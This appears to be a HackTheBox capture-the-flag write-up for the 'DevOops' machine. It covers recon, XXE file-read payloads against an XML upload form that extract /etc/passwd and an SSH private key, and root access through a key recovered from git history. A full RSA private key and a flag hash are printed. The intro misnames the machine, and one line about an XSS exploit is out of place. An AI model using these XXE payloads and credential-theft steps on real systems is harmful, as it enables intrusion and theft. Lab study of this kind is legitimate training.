DevOops

#Linux #Web #Injection #XXE

Tenten is an medium-rated Linux machine from HackTheBox created by Iokori. In the current post, my IP is 10.10.14.76, and the target’s IP is 10.129.102.140

The machine is a good review of concepts, the recognition step is standard and involves fuzzing to find new attack vectors, but it is necessary to have a reliable tool to detect the target's technologies, like Wappalyzer.

Once the correct vector is found, you have to exploit an explicit XXE to extract relevant files and log in as roosa. By the other hand, Privilege Escalation is patience, searching for information from a git project and other important files to extract the public key.

Recon

Local Terminal

> ping -c 1 10.129.102.140

PING 10.129.102.140 (10.129.102.140) 56(84) bytes of data.
64 bytes from 10.129.102.140: icmp_seq=1 ttl=63 time=273 ms

--- 10.129.102.140 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 273.347/273.347/273.347/0.000 ms

The machine is alive, and by the TTL (close but no more than 64), it is possible to think that the target is a Linux Machine.

Local Terminal

nmap -p- -sS --min-rate=5000 -Pn -n -oN AllPorts 10.129.102.140

Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-13 16:24 -03
Warning: 10.129.102.140 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.102.140
Host is up (0.27s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Local Terminal

nmap -sCV -p 22,5000 10.129.102.140 -oN Target

Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-13 16:26 -03
Nmap scan report for 10.129.102.140
Host is up (0.26s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 42:90:e3:35:31:8d:8b:86:17:2a:fb:38:90:da:c4:95 (RSA)
|   256 b7:b6:dc:c4:4c:87:9b:75:2a:00:89:83:ed:b2:80:31 (ECDSA)
|_  256 d5:2f:19:53:b2:8e:3a:4b:b3:dd:3c:1f:c0:37:0d:00 (ED25519)
5000/tcp open  http    Gunicorn 19.7.1
|_http-server-header: gunicorn/19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There are two open ports. First the port 22 with ssh, if you search about "OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 launchpad", we can see that the target is an "Ubuntu Xenial".

Port 5000

Local Terminal

> whatweb http://10.129.102.140:5000

http://10.129.102.140:5000 [200 OK] Country[RESERVED][ZZ], 
HTTPServer[gunicorn/19.7.1], IP[10.129.102.140]

Nothing relevant yet.

http://10.129.102.140:5000/

dev.solita.fi could be a domain, but it's a website outside the machine.

From Wappalyzer we know that the website uses PHP, a good option is to fuzz it with that extension.

Local Terminal

gobuster dir -u http://10.129.102.140:5000 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 200 -x php

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.102.140:5000
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/upload               (Status: 200) [Size: 347]
/feed                 (Status: 200) [Size: 546263]

And we found two alternatives, without the php extension.

http://10.129.102.140:5000/feed
- Just an image
http://10.129.102.140:5000/upload
- Place to upload files, with XML elements, interesting.

First, upload an empty file to see how it reacts, with vi test.xml, the create the proper XML, with vi exploit.xml

test.xml

Testing

exploit.xml

<elements>
        <Author>Tartox</Author>
        <Subject>String</Subject>
        <Content>Stringtwo</Content>
</elements>

From here we got a lot of information. First, the output is visible, this means that is possible to execute an XXE, and second, there is an user called "roosa" at the system.

Exploitation

Let's see if the exploits works, creating a file with vi exploit_proof.xml, then upload it.

exploit_proof.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<elements>
	<Author>Tartox</Author>
	<Subject>&xxe;</Subject>
	<Content>String</Content>
</elements>

Perfect, it works, remember that with Ctrl+U (view:source) you can see in a better format the targeted file.

Now, time to exploit, upload exploit_exec.xml.

exploit_exec.xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa"> ]>
<elements>
	<Author>Tartox</Author>
	<Subject>&xxe;</Subject>
	<Content>String</Content>
</elements>

In many machines, this exploits fails, an alternative to these situation, because the target use php, is the use of wrappers, like "php://filter/convert.base64-encode/resource=/var/www/html/index.php" after SYSTEM.

Reverse Shell - roosa

Perfect, we can read the id_rsa.

id_rsa

Local Terminal

> chmod 600 id_rsa
> ssh -i id_rsa roosa@10.129.102.140

See the content of the "Cross-Site Scripting" exploit, it's the version 4.1.0, it should be that.

Target Terminal [roosa]

roosa@devoops:~$ whoami
roosa
roosa@devoops:~$ cat user.txt
2d8b779192e11e67d6d8f2039338a37f

Privileges Escalation

Target Terminal [roosa]

roosa@devoops:~$ id
uid=1002(roosa) gid=1002(roosa) groups=1002(roosa),4(adm),27(sudo)
# group (adm), you can see the system's log with > ls -l /var/log 

roosa@devoops:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.4 LTS
Release:        16.04
Codename:       xenial #Nice

roosa@devoops:~$ ls -la
total 156
<...>
drwx------  3 root  root  4096 Mar 26  2021 .dbus
drwxrwxr-x  4 roosa roosa 4096 Mar 26  2021 deploy
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Desktop
-rw-r--r--  1 roosa roosa   25 Mar 21  2018 .dmrc
<...>
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Templates
-r--------  1 roosa roosa   33 Sep 13 15:04 user.txt
drwxr-xr-x  2 roosa roosa 4096 Mar 26  2021 Videos
drwxrwxr-x  3 roosa roosa 4096 Mar 26  2021 work
<...>

A lot of files, but there are two curious folder, deploy and work. Let's check work.

Target Terminal [roosa]

roosa@devoops:~$ cd work
roosa@devoops:~/work$ ls -la
total 12
drwxrwxr-x  3 roosa roosa 4096 Mar 26  2021 .
drwxr-xr-x 22 roosa roosa 4096 Sep 23  2022 ..
drwxrwx---  5 roosa roosa 4096 Mar 26  2021 blogfeed

roosa@devoops:~/work$ cd blogfeed
roosa@devoops:~/work/blogfeed$ ls -la
total 28
drwxrwx--- 5 roosa roosa 4096 Mar 26  2021 .
drwxrwxr-x 3 roosa roosa 4096 Mar 26  2021 ..
drwxrwx--- 8 roosa roosa 4096 Mar 26  2021 .git
-rw-rw---- 1 roosa roosa  104 Mar 19  2018 README.md
drwxrwx--- 3 roosa roosa 4096 Mar 26  2021 resources
-rwxrw-r-- 1 roosa roosa  180 Mar 21  2018 run-gunicorn.sh
drwxrwx--- 2 roosa roosa 4096 Mar 26  2021 src

Good, there is git, in those cases is always a good practice to see the commits for old relevant information... ALWAYS! But first, let's see if there is another hidden file here.

Target Terminal [roosa]

roosa@devoops:~/work/blogfeed$ find .
.
./run-gunicorn.sh
./resources
./resources/integration
./resources/integration/authcredentials.key
./.git
./.git/objects
./.git/objects/33
./.git/objects/33/e87c312c08735a02fa9c796021a4a3023129ad
<...>

A file with credentials?

Target Terminal [roosa]

roosa@devoops:~/work/blogfeed$ cat ./resources/integration/authcredentials.key
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEApc7idlMQHM4QDf2d8MFjIW40UickQx/cvxPZX0XunSLD8veN
ouroJLw0Qtfh+dS6y+rbHnj4+HySF1HCAWs53MYS7m67bCZh9Bj21+E4fz/uwDSE
23g18kmkjmzWQ2AjDeC0EyWH3k4iRnABruBHs8+fssjW5sSxze74d7Ez3uOI9zPE
sQ26ynmLutnd/MpyxFjCigP02McCBrNLaclcbEgBgEn9v+KBtUkfgMgt5CNLfV8s
ukQs4gdHPeSj7kDpgHkRyCt+YAqvs3XkrgMDh3qI9tCPfs8jHUvuRHyGdMnqzI16
ZBlx4UG0bdxtoE8DLjfoJuWGfCF/dTAFLHK3mwIDAQABAoIBADelrnV9vRudwN+h
LZ++l7GBlge4YUAx8lkipUKHauTL5S2nDZ8O7ahejb+dSpcZYTPM94tLmGt1C2bO
JqlpPjstMu9YtIhAfYF522ZqjRaP82YIekpaFujg9FxkhKiKHFms/2KppubiHDi9
oKL7XLUpSnSrWQyMGQx/Vl59V2ZHNsBxptZ+qQYavc7bGP3h4HoRurrPiVlmPwXM
xL8NWx4knCZEC+YId8cAqyJ2EC4RoAr7tQ3xb46jC24Gc/YFkI9b7WCKpFgiszhw
vFvkYQDuIvzsIyunqe3YR0v8TKEfWKtm8T9iyb2yXTa+b/U3I9We1P+0nbfjYX8x
6umhQuECgYEA0fvp8m2KKJkkigDCsaCpP5dWPijukHV+CLBldcmrvUxRTIa8o4e+
OWOMW1JPEtDTj7kDpikekvHBPACBd5fYnqYnxPv+6pfyh3H5SuLhu9PPA36MjRyE
4+tDgPvXsfQqAKLF3crG9yKVUqw2G8FFo7dqLp3cDxCs5sk6Gq/lAesCgYEAyiS0
937GI+GDtBZ4bjylz4L5IHO55WI7CYPKrgUeKqi8ovKLDsBEboBbqRWcHr182E94
SQMoKu++K1nbly2YS+mv4bOanSFdc6bT/SAHKdImo8buqM0IhrYTNvArN/Puv4VT
Nszh8L9BDEc/DOQQQzsKiwIHab/rKJHZeA6cBRECgYEAgLg6CwAXBxgJjAc3Uge4
eGDe3y/cPfWoEs9/AptjiaD03UJi9KPLegaKDZkBG/mjFqFFmV/vfAhyecOdmaAd
i/Mywc/vzgLjCyBUvxEhazBF4FB8/CuVUtnvAWxgJpgT/1vIi1M4cFpkys8CRDVP
6TIQBw+BzEJemwKTebSFX40CgYEAtZt61iwYWV4fFCln8yobka5KoeQ2rCWvgqHb
8rH4Yz0LlJ2xXwRPtrMtJmCazWdSBYiIOZhTexe+03W8ejrla7Y8ZNsWWnsCWYgV
RoGCzgjW3Cc6fX8PXO+xnZbyTSejZH+kvkQd7Uv2ZdCQjcVL8wrVMwQUouZgoCdA
qML/WvECgYEAyNoevgP+tJqDtrxGmLK2hwuoY11ZIgxHUj9YkikwuZQOmFk3EffI
T3Sd/6nWVzi1FO16KjhRGrqwb6BCDxeyxG508hHzikoWyMN0AA2st8a8YS6jiOog
bU34EzQLp7oRU/TKO6Mx5ibQxkZPIHfgA1+Qsu27yIwlprQ64+oeEr0=
-----END RSA PRIVATE KEY-----

Another id_rsa, go to home to check for more users.

Another way to see the user list with bash, is by reading the /etc/passwd file and check who has the "bash" available.

Target Terminal [roosa]

roosa@devoops:~/work/blogfeed$ cd /home

roosa@devoops:/home$ ls -la
total 28
drwxr-xr-x  7 root     root     4096 Mar 26  2021 .
drwxr-xr-x 23 root     root     4096 Sep 23  2022 ..
drwxr-xr-x  2 blogfeed blogfeed 4096 Mar 26  2021 blogfeed
drwxr-xr-x  4 git      git      4096 Sep 23  2022 git
drwx------  2 root     root     4096 Mar 26  2021 lost+found
drwxr-xr-x 16 osboxes  osboxes  4096 Mar 26  2021 osboxes
drwxr-xr-x 22 roosa    roosa    4096 Sep 23  2022 roosa

Many user to test the id_rsa, if is not the correct one, we should check the past-commits for mistakes.

Copy the authcredentials.keys as id_rsa to the tmp folder, then connect through ssh.

Target Terminal [roosa]

roosa@devoops:/home$ cd /tmp
roosa@devoops:/tmp$ cp /home/roosa/work/blogfeed/resources/integration/authcredentials.key /tmp/id_rsa
roosa@devoops:/tmp$ chmod 600 id_rsa
roosa@devoops:/tmp$ ssh -i id_rsa root@localhost
    # It requires password with every user, forget about it.

Return to the blogfeed folder with cd /home/roosa/work/blogfeed

Target Terminal [roosa]

roosa@devoops:~/work/blogfeed$ git log

"reverted accidental commit with proper key" looks like an interesting mistake, copy the commit code.

Target Terminal [roosa]

roosa@devoops:~/work/blogfeed$ git log -p 33e87c312c08735a02fa9c796021a4a3023129ad

It shows a deleted id_rsa, copy the red one at /tmp and try to use it.

id_rsa_two

Target Terminal [roosa]

roosa@devoops:/tmp$ chmod 600 id_rsa_two
roosa@devoops:/tmp$ ssh -i id_rsa_two root@localhost
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Fri Sep 23 09:46:30 2022
root@devoops:~# cat root.txt

And it works, the machine is done.

PreviousCanape NextForgot

Last updated 2 years ago